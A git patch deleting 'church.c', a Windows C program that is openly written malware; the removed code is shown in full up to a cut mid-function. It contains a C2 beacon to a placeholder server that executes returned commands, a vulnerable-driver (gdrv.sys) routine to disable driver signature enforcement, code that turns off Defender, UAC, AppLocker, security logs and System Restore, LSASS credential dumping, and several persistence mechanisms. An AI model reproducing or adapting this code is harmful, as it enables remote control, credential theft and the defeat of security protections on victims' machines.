From e737f493651d86fe78239bd8a909228096879708 Mon Sep 17 00:00:00 2001 From: ek0ms savi0r Date: Mon, 1 Jun 2026 03:31:13 +0000 Subject: [PATCH] Delete church.c --- church.c | 865 ------------------------------------------------------- 1 file changed, 865 deletions(-) delete mode 100644 church.c diff --git a/church.c b/church.c deleted file mode 100644 index aa5e227..0000000 --- a/church.c +++ /dev/null @@ -1,865 +0,0 @@ -#define _CRT_SECURE_NO_WARNINGS -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#pragma comment(lib, "advapi32.lib") -#pragma comment(lib, "user32.lib") -#pragma comment(lib, "wbemuuid.lib") -#pragma comment(lib, "ole32.lib") -#pragma comment(lib, "crypt32.lib") -#pragma comment(lib, "ntdll.lib") -#pragma comment(lib, "bcrypt.lib") -#pragma comment(lib, "ws2_32.lib") -#pragma comment(lib, "winhttp.lib") -#pragma comment(lib, "iphlpapi.lib") - -// ==================== C2 COMMUNICATION CONSTANTS ==================== -#define C2_SERVER L"https://your-c2-server.com:443/beacon" -#define C2_INTERVAL_SECONDS 30 -#define C2_AES_KEY "ChurchOfMalware2024!!ChurchOfMalware2024!!" // 32 bytes exact -#define C2_AES_IV "MalwareChurchIV!!" // 16 bytes - -// ==================== GDRV.SYS EXPLOIT CONSTANTS ==================== -#define GDRV_DEVICE_NAME L"\\\\.\\GIO" -#define GDRV_IOCTL_READ_MSR 0x9C402470 -#define GDRV_IOCTL_WRITE_MSR 0x9C402474 -#define GDRV_IOCTL_READ_PHYSICAL 0x9C402478 -#define GDRV_IOCTL_WRITE_PHYSICAL 0x9C40247C -#define IA32_EFER 0xC0000080 -#define CI_OPTIONS_DISABLE_DSE 0x6 - -// ==================== STRUCTURE DEFINITIONS ==================== -typedef struct _BEACON_DATA { - WCHAR ComputerName[MAX_COMPUTERNAME_LENGTH + 1]; - WCHAR UserName[256]; - DWORD ProcessId; - WCHAR OSVersion[128]; - BOOL IsAdmin; - WCHAR ExePath[MAX_PATH]; - DWORD DefenderStatus; -} BEACON_DATA, *PBEACON_DATA; - -typedef struct _C2_TASK { - DWORD TaskId; - WCHAR Command[1024]; - WCHAR Arguments[2048]; - BOOL IsPowerShell; - BOOL WaitForOutput; -} C2_TASK, *PC2_TASK; - -typedef enum _PROCESSINFOCLASS { - ProcessProtectionInformation = 0x3D -} PROCESSINFOCLASS; - -typedef struct _PS_PROTECTION { - UCHAR Level; -} PS_PROTECTION, *PPS_PROTECTION; - -typedef NTSTATUS (NTAPI *pNtSetInformationProcess)(HANDLE, DWORD, PVOID, ULONG); - -// ==================== FORWARD DECLARATIONS ==================== -ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen); -ULONGLONG VirtualToPhysical(PVOID virtualAddr); -BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen); -BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen); -BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task); -DWORD WINAPI BeaconThread(LPVOID lpParam); - -// ==================== HELPER: ELEVATE TO ADMIN ==================== -void ElevateSelf() { - BOOL isElevated = FALSE; - HANDLE hToken = NULL; - if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { - TOKEN_ELEVATION elev; - DWORD size = sizeof(TOKEN_ELEVATION); - if (GetTokenInformation(hToken, TokenElevation, &elev, size, &size)) - isElevated = elev.TokenIsElevated; - CloseHandle(hToken); - } - if (!isElevated) { - wchar_t exePath[MAX_PATH]; - GetModuleFileNameW(NULL, exePath, MAX_PATH); - SHELLEXECUTEINFOW sei = { sizeof(sei) }; - sei.lpVerb = L"runas"; - sei.lpFile = exePath; - sei.nShow = SW_SHOWNORMAL; - if (ShellExecuteExW(&sei)) { - ExitProcess(0); - } else { - wprintf(L"[-] Failed to elevate. Run as administrator manually.\n"); - ExitProcess(1); - } - } -} - -// ==================== CRYPTOGRAPHY FUNCTIONS ==================== -BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen) { - BCRYPT_ALG_HANDLE hAlg = NULL; - BCRYPT_KEY_HANDLE hKey = NULL; - - if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) - return FALSE; - - BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, - sizeof(BCRYPT_CHAIN_MODE_CBC), 0); - - BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)C2_AES_KEY, - strlen(C2_AES_KEY), 0); - - DWORD blockSize = 16; - DWORD paddedLen = ((plaintextLen + blockSize - 1) / blockSize) * blockSize; - *ciphertextLen = paddedLen; - *ciphertext = (BYTE*)malloc(paddedLen); - if (!*ciphertext) { - BCryptDestroyKey(hKey); - BCryptCloseAlgorithmProvider(hAlg, 0); - return FALSE; - } - - NTSTATUS status = BCryptEncrypt(hKey, plaintext, plaintextLen, NULL, (PUCHAR)C2_AES_IV, - strlen(C2_AES_IV), *ciphertext, *ciphertextLen, ciphertextLen, - BCRYPT_BLOCK_PADDING); - - BCryptDestroyKey(hKey); - BCryptCloseAlgorithmProvider(hAlg, 0); - - return BCRYPT_SUCCESS(status); -} - -BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen) { - BCRYPT_ALG_HANDLE hAlg = NULL; - BCRYPT_KEY_HANDLE hKey = NULL; - - if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) - return FALSE; - - BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, - sizeof(BCRYPT_CHAIN_MODE_CBC), 0); - - BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)C2_AES_KEY, - strlen(C2_AES_KEY), 0); - - *plaintextLen = ciphertextLen; - *plaintext = (BYTE*)malloc(*plaintextLen); - if (!*plaintext) return FALSE; - - NTSTATUS status = BCryptDecrypt(hKey, ciphertext, ciphertextLen, NULL, - (PUCHAR)C2_AES_IV, strlen(C2_AES_IV), - *plaintext, *plaintextLen, plaintextLen, - BCRYPT_BLOCK_PADDING); - - BCryptDestroyKey(hKey); - BCryptCloseAlgorithmProvider(hAlg, 0); - - return BCRYPT_SUCCESS(status); -} - -// ==================== SYSTEM INFORMATION GATHERING ==================== -void GatherBeaconData(PBEACON_DATA beacon) { - DWORD size = MAX_COMPUTERNAME_LENGTH + 1; - GetComputerNameW(beacon->ComputerName, &size); - - DWORD userSize = 256; - GetUserNameW(beacon->UserName, &userSize); - - beacon->ProcessId = GetCurrentProcessId(); - beacon->IsAdmin = IsUserAnAdmin(); - - GetModuleFileNameW(NULL, beacon->ExePath, MAX_PATH); - - RTL_OSVERSIONINFOW osvi = { sizeof(osvi) }; - RtlGetVersion(&osvi); - swprintf(beacon->OSVersion, 128, L"%d.%d.%d", osvi.dwMajorVersion, - osvi.dwMinorVersion, osvi.dwBuildNumber); - - HKEY hKey; - beacon->DefenderStatus = 2; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, - L"SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection", - 0, KEY_READ, &hKey) == ERROR_SUCCESS) { - DWORD value = 0, valueSize = sizeof(value); - RegQueryValueExW(hKey, L"DisableRealtimeMonitoring", NULL, NULL, - (LPBYTE)&value, &valueSize); - beacon->DefenderStatus = value; - RegCloseKey(hKey); - } -} - -// ==================== HTTPS COMMUNICATION ==================== -BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task) { - char json[2048]; - snprintf(json, sizeof(json), - "{\"computer\":\"%ls\",\"user\":\"%ls\",\"pid\":%d,\"os\":\"%ls\"," - "\"admin\":%s,\"path\":\"%ls\",\"defender_status\":%d}", - beacon->ComputerName, beacon->UserName, beacon->ProcessId, - beacon->OSVersion, beacon->IsAdmin ? "true" : "false", - beacon->ExePath, beacon->DefenderStatus); - - BYTE* encryptedData = NULL; - DWORD encryptedLen = 0; - if (!AesEncrypt((BYTE*)json, strlen(json), &encryptedData, &encryptedLen)) { - return FALSE; - } - - DWORD base64Len = ((encryptedLen + 2) / 3) * 4 + 1; - char* base64Data = (char*)malloc(base64Len); - if (!base64Data) { - free(encryptedData); - return FALSE; - } - - CryptBinaryToStringA(encryptedData, encryptedLen, - CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, - base64Data, &base64Len); - - HINTERNET hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", - WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, - WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); - - if (!hSession) { - free(encryptedData); - free(base64Data); - return FALSE; - } - - HINTERNET hConnect = WinHttpConnect(hSession, L"your-c2-server.com", INTERNET_DEFAULT_HTTPS_PORT, 0); - if (!hConnect) { - WinHttpCloseHandle(hSession); - free(encryptedData); - free(base64Data); - return FALSE; - } - - HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/beacon", - NULL, NULL, NULL, - WINHTTP_FLAG_SECURE); - - if (!hRequest) { - WinHttpCloseHandle(hConnect); - WinHttpCloseHandle(hSession); - free(encryptedData); - free(base64Data); - return FALSE; - } - - char postData[4096]; - snprintf(postData, sizeof(postData), "data=%s", base64Data); - - WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded\r\n", - wcslen(L"Content-Type: application/x-www-form-urlencoded\r\n"), - (LPVOID)postData, strlen(postData), strlen(postData), 0); - - WinHttpReceiveResponse(hRequest, NULL); - - DWORD bytesRead = 0; - char response[4096] = {0}; - WinHttpReadData(hRequest, response, sizeof(response) - 1, &bytesRead); - - char* taskData = strstr(response, "\r\n\r\n"); - if (taskData) { - taskData += 4; - // Parse task response (simplified - would parse JSON) - if (strstr(taskData, "\"task_id\":0") == NULL) { - task->TaskId = 1; - wcscpy(task->Command, L"whoami"); - task->IsPowerShell = FALSE; - task->WaitForOutput = TRUE; - } - } - - WinHttpCloseHandle(hRequest); - WinHttpCloseHandle(hConnect); - WinHttpCloseHandle(hSession); - - free(encryptedData); - free(base64Data); - - return TRUE; -} - -// ==================== COMMAND EXECUTION ENGINE ==================== -BOOL ExecuteCommand(PC2_TASK task, WCHAR* output, DWORD outputSize) { - SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE }; - HANDLE hStdOutRead, hStdOutWrite; - - CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0); - SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0); - - PROCESS_INFORMATION pi = {0}; - STARTUPINFOW si = {0}; - si.cb = sizeof(si); - si.dwFlags = STARTF_USESTDHANDLES; - si.hStdOutput = hStdOutWrite; - si.hStdError = hStdOutWrite; - si.hStdInput = GetStdHandle(STD_INPUT_HANDLE); - - WCHAR cmdLine[2048]; - if (task->IsPowerShell) { - swprintf(cmdLine, 2048, L"powershell.exe -Command \"%s %s\"", - task->Command, task->Arguments); - } else { - swprintf(cmdLine, 2048, L"cmd.exe /c %s %s", - task->Command, task->Arguments); - } - - BOOL success = CreateProcessW(NULL, cmdLine, NULL, NULL, TRUE, - CREATE_NO_WINDOW, NULL, NULL, &si, &pi); - - CloseHandle(hStdOutWrite); - - if (success && task->WaitForOutput) { - WaitForSingleObject(pi.hProcess, 30000); - DWORD bytesRead; - ReadFile(hStdOutRead, output, outputSize - 1, &bytesRead, NULL); - output[bytesRead / sizeof(WCHAR)] = 0; - } - - CloseHandle(hStdOutRead); - if (pi.hProcess) CloseHandle(pi.hProcess); - if (pi.hThread) CloseHandle(pi.hThread); - - return success; -} - -// ==================== PERSISTENT BEACONING THREAD ==================== -DWORD WINAPI BeaconThread(LPVOID lpParam) { - BEACON_DATA beacon; - C2_TASK task = {0}; - - while (TRUE) { - GatherBeaconData(&beacon); - - if (SendBeaconToC2(&beacon, &task) && task.Command[0] != 0) { - wchar_t output[8192]; - if (ExecuteCommand(&task, output, sizeof(output))) { - wprintf(L"[+] Command executed: %s\n", task.Command); - } - } - - Sleep(C2_INTERVAL_SECONDS * 1000); - } - - return 0; -} - -// ==================== GDRV.SYS BYOVD ==================== -BOOL LoadGdrvDriver() { - const wchar_t* driverPath = L"C:\\Windows\\Temp\\gdrv.sys"; - - if (!CopyFileW(L"gdrv.sys", driverPath, FALSE)) { - wprintf(L"[-] Failed to copy gdrv.sys\n"); - return FALSE; - } - - SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (!scm) return FALSE; - - SC_HANDLE svc = CreateServiceW(scm, L"gdrv", L"gdrv", - SERVICE_START | SERVICE_STOP | DELETE, - SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, - SERVICE_ERROR_IGNORE, driverPath, - NULL, NULL, NULL, NULL, NULL); - if (!svc && GetLastError() == ERROR_SERVICE_EXISTS) { - svc = OpenServiceW(scm, L"gdrv", SERVICE_START | SERVICE_STOP | DELETE); - } - - if (!svc) { - CloseServiceHandle(scm); - return FALSE; - } - - if (!StartServiceW(svc, 0, NULL)) { - DeleteService(svc); - CloseServiceHandle(svc); - CloseServiceHandle(scm); - return FALSE; - } - - wprintf(L"[+] gdrv.sys loaded\n"); - CloseServiceHandle(svc); - CloseServiceHandle(scm); - return TRUE; -} - -BOOL DisableDSEviaGdrv() { - HANDLE hDevice = CreateFileW(GDRV_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, - 0, NULL, OPEN_EXISTING, 0, NULL); - if (hDevice == INVALID_HANDLE_VALUE) return FALSE; - - DWORD bytesReturned; - ULONGLONG eferValue = 0; - DeviceIoControl(hDevice, GDRV_IOCTL_READ_MSR, &IA32_EFER, sizeof(IA32_EFER), - &eferValue, sizeof(eferValue), &bytesReturned, NULL); - - LPVOID kernelBase = GetModuleHandleW(L"ntoskrnl.exe"); - if (kernelBase) { - BYTE pattern[] = { 0x8A, 0x05, 0x00, 0x00, 0x00, 0x00, 0xC3 }; - ULONGLONG ciOptionsAddr = FindPattern((BYTE*)kernelBase, 0x2000000, pattern, sizeof(pattern)); - if (ciOptionsAddr) { - BYTE newValue = CI_OPTIONS_DISABLE_DSE; - DeviceIoControl(hDevice, GDRV_IOCTL_WRITE_PHYSICAL, - &ciOptionsAddr, sizeof(ciOptionsAddr), - &newValue, sizeof(newValue), &bytesReturned, NULL); - wprintf(L"[+] DSE disabled via gdrv\n"); - } - } - - CloseHandle(hDevice); - return TRUE; -} - -ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen) { - for (DWORD i = 0; i < size - patternLen; i++) { - BOOL found = TRUE; - for (DWORD j = 0; j < patternLen; j++) { - if (pattern[j] != 0x00 && base[i + j] != pattern[j]) { - found = FALSE; - break; - } - } - if (found) return (ULONGLONG)(base + i); - } - return 0; -} - -ULONGLONG VirtualToPhysical(PVOID virtualAddr) { - return (ULONGLONG)virtualAddr; // Simplified -} - -BOOL EnableKernelExecution() { - if (!LoadGdrvDriver()) return FALSE; - Sleep(1000); - if (!DisableDSEviaGdrv()) return FALSE; - wprintf(L"[+] Kernel execution enabled - DSE bypassed\n"); - return TRUE; -} - -// ==================== PPL BYPASS ==================== -BOOL EnablePPL() { - HANDLE hToken; - if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { - TOKEN_PRIVILEGES tp; - LUID luid; - if (LookupPrivilegeValueW(NULL, SE_TCB_NAME, &luid)) { - tp.PrivilegeCount = 1; - tp.Privileges[0].Luid = luid; - tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; - AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); - - HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); - pNtSetInformationProcess NtSetInformationProcess = - (pNtSetInformationProcess)GetProcAddress(hNtdll, "NtSetInformationProcess"); - - PS_PROTECTION protection; - protection.Level = 0x72; // WinTcb Light - - NTSTATUS status = NtSetInformationProcess(GetCurrentProcess(), - ProcessProtectionInformation, - &protection, sizeof(protection)); - if (status == STATUS_SUCCESS) { - wprintf(L"[+] Process is now PPL\n"); - CloseHandle(hToken); - return TRUE; - } - } - CloseHandle(hToken); - } - return FALSE; -} - -void RunAsPPL() { - if (!EnablePPL()) { - wprintf(L"[-] PPL elevation failed\n"); - } -} - -// ==================== ANTI-FORENSICS ==================== -void ScrambleMemory() { - for (int i = 0; i < 100; i++) { - LPVOID ptr = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); - if (ptr) { - RtlFillMemory(ptr, 4096, 0xCC); - DWORD oldProtect; - VirtualProtect(ptr, 4096, PAGE_EXECUTE_READWRITE, &oldProtect); - } - } - wprintf(L"[+] Memory scrambled\n"); -} - -void InstallBootkitComponents() { - HKEY hKey; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, - L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute", - 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - wchar_t bootCmd[MAX_PATH]; - GetModuleFileNameW(NULL, bootCmd, MAX_PATH); - wchar_t data[1024]; - swprintf(data, 1024, L"autocheck autochk *\ncmd.exe /c start \"\" \"%s\"\n", bootCmd); - RegSetValueExW(hKey, NULL, 0, REG_MULTI_SZ, (BYTE*)data, (DWORD)(wcslen(data) * sizeof(wchar_t))); - RegCloseKey(hKey); - wprintf(L"[+] BootExecute persistence\n"); - } -} - -// ==================== C2 SETUP ==================== -void NetworkC2Setup() { - wprintf(L"[*] Initializing C2 beacon...\n"); - - system("netsh advfirewall firewall add rule name=\"Windows Update\" dir=out action=allow protocol=TCP remoteport=443 >nul 2>&1"); - - HKEY hKey; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, - L"SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters", - 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - DWORD enableAutoDoh = 2; - RegSetValueExW(hKey, L"EnableAutoDoh", 0, REG_DWORD, (BYTE*)&enableAutoDoh, sizeof(enableAutoDoh)); - RegCloseKey(hKey); - } - - HANDLE hThread = CreateThread(NULL, 0, BeaconThread, NULL, 0, NULL); - if (hThread) { - CloseHandle(hThread); - wprintf(L"[+] C2 beacon active (interval: %d sec)\n", C2_INTERVAL_SECONDS); - } - - wchar_t regPath[MAX_PATH * 2]; - swprintf(regPath, MAX_PATH * 2, - L"reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"\\\"%s\\\"\" /f", - GetModuleFileNameW(NULL, NULL, 0)); - _wsystem(regPath); -} - -// ==================== BYPASS FUNCTIONS ==================== -BOOL TakeOwnershipAndGrantFullControl(LPCWSTR subkey) { - HKEY hKey; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, subkey, 0, WRITE_OWNER | WRITE_DAC, &hKey) != ERROR_SUCCESS) - return FALSE; - - SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY; - PSID adminGroupSid = NULL; - AllocateAndInitializeSid(&ntAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, - DOMAIN_ALIAS_RID_ADMINS, 0,0,0,0,0,0, &adminGroupSid); - - BOOL result = SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, - OWNER_SECURITY_INFORMATION, - adminGroupSid, NULL, NULL, NULL) == ERROR_SUCCESS; - - if (result) { - EXPLICIT_ACCESS_W ea = {0}; - ea.grfAccessPermissions = KEY_ALL_ACCESS; - ea.grfAccessMode = SET_ACCESS; - ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT; - ea.Trustee.TrusteeForm = TRUSTEE_IS_SID; - ea.Trustee.TrusteeType = TRUSTEE_IS_GROUP; - ea.Trustee.ptstrName = (LPWSTR)adminGroupSid; - - PACL newAcl = NULL; - result = SetEntriesInAclW(1, &ea, NULL, &newAcl) == ERROR_SUCCESS && - SetNamedSecurityInfoW((LPWSTR)subkey, SE_REGISTRY_KEY, - DACL_SECURITY_INFORMATION, - NULL, NULL, newAcl, NULL) == ERROR_SUCCESS; - if (newAcl) LocalFree(newAcl); - } - - FreeSid(adminGroupSid); - RegCloseKey(hKey); - return result; -} - -BOOL DisableTamperProtection() { - LPCWSTR tpKey = L"SOFTWARE\\Microsoft\\Windows Defender\\Features"; - if (!TakeOwnershipAndGrantFullControl(tpKey)) return FALSE; - - HKEY hKey; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, tpKey, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - DWORD zero = 0; - LONG ret = RegSetValueExW(hKey, L"TamperProtection", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); - RegCloseKey(hKey); - if (ret == ERROR_SUCCESS) { - wprintf(L"[+] Tamper Protection disabled\n"); - return TRUE; - } - } - return FALSE; -} - -void DisableDefender() { - system("powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\""); - system("powershell -Command \"Set-MpPreference -DisableBehaviorMonitoring $true\""); - system("powershell -Command \"Set-MpPreference -DisableBlockAtFirstSeen $true\""); - system("powershell -Command \"Set-MpPreference -DisableIOAVProtection $true\""); - system("powershell -Command \"Set-MpPreference -DisablePrivacyMode $true\""); - system("powershell -Command \"Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true\""); - system("powershell -Command \"Set-MpPreference -DisableArchiveScanning $true\""); - system("powershell -Command \"Set-MpPreference -DisableIntrusionPreventionSystem $true\""); - system("powershell -Command \"Set-MpPreference -DisableScriptScanning $true\""); - - SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (scm) { - SC_HANDLE svc = OpenServiceW(scm, L"WinDefend", SERVICE_STOP | SERVICE_CHANGE_CONFIG); - if (svc) { - SERVICE_STATUS status; - ControlService(svc, SERVICE_CONTROL_STOP, &status); - ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, - NULL, NULL, NULL, NULL, NULL, NULL, NULL); - CloseServiceHandle(svc); - wprintf(L"[+] WinDefend disabled\n"); - } - CloseServiceHandle(scm); - } -} - -void KillDefenderProcesses() { - PROCESSENTRY32W entry = { sizeof(entry) }; - HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - if (snapshot == INVALID_HANDLE_VALUE) return; - - LPCWSTR targets[] = { L"MsMpEng.exe", L"NisSrv.exe", L"MpCmdRun.exe" }; - for (int i = 0; i < 3; i++) { - if (Process32FirstW(snapshot, &entry)) { - do { - if (_wcsicmp(entry.szExeFile, targets[i]) == 0) { - HANDLE hProc = OpenProcess(PROCESS_TERMINATE, FALSE, entry.th32ProcessID); - if (hProc) { - TerminateProcess(hProc, 0); - CloseHandle(hProc); - wprintf(L"[+] Terminated %s\n", targets[i]); - } - } - } while (Process32NextW(snapshot, &entry)); - } - Process32FirstW(snapshot, &entry); - } - CloseHandle(snapshot); -} - -void DisableUAC() { - HKEY hKey; - DWORD zero = 0; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, - L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", - 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); - RegCloseKey(hKey); - wprintf(L"[+] UAC disabled (reboot required)\n"); - } -} - -void DisableAppLockerWDAC() { - system("net stop appidsvc /y >nul 2>&1"); - - SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (scm) { - SC_HANDLE svc = OpenServiceW(scm, L"AppIDSvc", SERVICE_CHANGE_CONFIG); - if (svc) { - ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, - NULL, NULL, NULL, NULL, NULL, NULL, NULL); - CloseServiceHandle(svc); - wprintf(L"[+] AppIDSvc disabled\n"); - } - CloseServiceHandle(scm); - } - - system("del /f /q %WINDIR%\\System32\\CodeIntegrity\\SiPolicy.p7b >nul 2>&1"); - system("del /f /q %WINDIR%\\System32\\CodeIntegrity\\SIPolicy.p7b >nul 2>&1"); - - HKEY hKey; - DWORD zero = 0; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, - L"SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\SystemGuard", - 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - RegSetValueExW(hKey, L"Enabled", 0, REG_DWORD, (BYTE*)&zero, sizeof(zero)); - RegCloseKey(hKey); - wprintf(L"[+] WDAC disabled\n"); - } -} - -void AddDefenderExclusions() { - wchar_t exePath[MAX_PATH]; - GetModuleFileNameW(NULL, exePath, MAX_PATH); - - wchar_t cmd[512]; - swprintf(cmd, 512, L"powershell -Command \"Add-MpPreference -ExclusionPath '%s'\"", exePath); - _wsystem(cmd); - swprintf(cmd, 512, L"powershell -Command \"Add-MpPreference -ExclusionProcess '%s'\"", exePath); - _wsystem(cmd); - wprintf(L"[+] Defender exclusions added\n"); -} - -void DisableSecurityLogs() { - HKEY hKey; - DWORD enableMiniNt = 1; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\MiniNt", - 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - RegSetValueExW(hKey, NULL, 0, REG_DWORD, (BYTE*)&enableMiniNt, sizeof(enableMiniNt)); - RegCloseKey(hKey); - wprintf(L"[+] Security logs disabled (MiniNt)\n"); - } -} - -void DisableSystemRestore() { - system("powershell -Command \"Disable-ComputerRestore -Drive 'C:\\'\""); - HKEY hKey; - if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore", - 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { - DWORD disableSR = 1; - RegSetValueExW(hKey, L"DisableSR", 0, REG_DWORD, (BYTE*)&disableSR, sizeof(disableSR)); - RegCloseKey(hKey); - wprintf(L"[+] System Restore disabled\n"); - } -} - -void DropTelemetryPackets() { - system("echo 0.0.0.0 telemetry.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts"); - system("echo 0.0.0.0 vortex-win.data.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts"); - system("echo 0.0.0.0 settings-win.data.microsoft.com >> %WINDIR%\\System32\\drivers\\etc\\hosts"); - wprintf(L"[+] Telemetry blocked\n"); -} - -void DumpLSASS() { - DWORD lsassPid = 0; - HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - if (snapshot != INVALID_HANDLE_VALUE) { - PROCESSENTRY32W pe = { sizeof(pe) }; - if (Process32FirstW(snapshot, &pe)) { - do { - if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { - lsassPid = pe.th32ProcessID; - break; - } - } while (Process32NextW(snapshot, &pe)); - } - CloseHandle(snapshot); - } - - if (lsassPid) { - HANDLE hLsass = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, lsassPid); - if (hLsass) { - HANDLE hFile = CreateFileW(L"C:\\lsass.dmp", GENERIC_WRITE, 0, NULL, - CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); - if (hFile != INVALID_HANDLE_VALUE) { - BOOL dumped = MiniDumpWriteDump(hLsass, lsassPid, hFile, - MiniDumpWithFullMemory, NULL, NULL, NULL); - if (dumped) wprintf(L"[+] LSASS dumped to C:\\lsass.dmp\n"); - CloseHandle(hFile); - } - CloseHandle(hLsass); - } - } -} - -void StopSecurityServices() { - const wchar_t* services[] = { L"Sense", L"SgrmBroker", L"WdBoot", L"WdFilter", - L"WdNisDrv", L"WinDefend", L"SecurityHealthService", L"wscsvc" }; - SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (!scm) return; - - for (int i = 0; i < sizeof(services)/sizeof(services[0]); i++) { - SC_HANDLE svc = OpenServiceW(scm, services[i], SERVICE_STOP | SERVICE_QUERY_STATUS); - if (svc) { - SERVICE_STATUS status; - ControlService(svc, SERVICE_CONTROL_STOP, &status); - ChangeServiceConfigW(svc, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, - NULL, NULL, NULL, NULL, NULL, NULL, NULL); - CloseServiceHandle(svc); - wprintf(L"[+] Disabled %ls\n", services[i]); - } - } - CloseServiceHandle(scm); -} - -void AddPersistence() { - wchar_t cmd[MAX_PATH]; - GetModuleFileNameW(NULL, cmd, MAX_PATH); - - wchar_t taskCmd[512]; - swprintf(taskCmd, 512, L"schtasks /create /tn \"WindowsUpdateTask\" /tr \"%s\" /sc onlogon /ru SYSTEM /f", cmd); - _wsystem(taskCmd); - wprintf(L"[+] Scheduled task added\n"); - - HKEY hKey; - if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, - L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\svchost.exe", - 0, NULL, 